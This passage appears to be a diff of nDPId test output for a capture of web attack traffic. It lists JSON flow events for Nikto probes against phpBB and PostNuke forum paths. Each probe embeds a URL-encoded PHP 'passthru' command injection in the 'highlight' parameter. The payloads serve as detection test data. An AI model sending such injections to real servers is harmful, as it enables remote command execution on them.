-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7580000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7580000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01213{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} 
-01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": 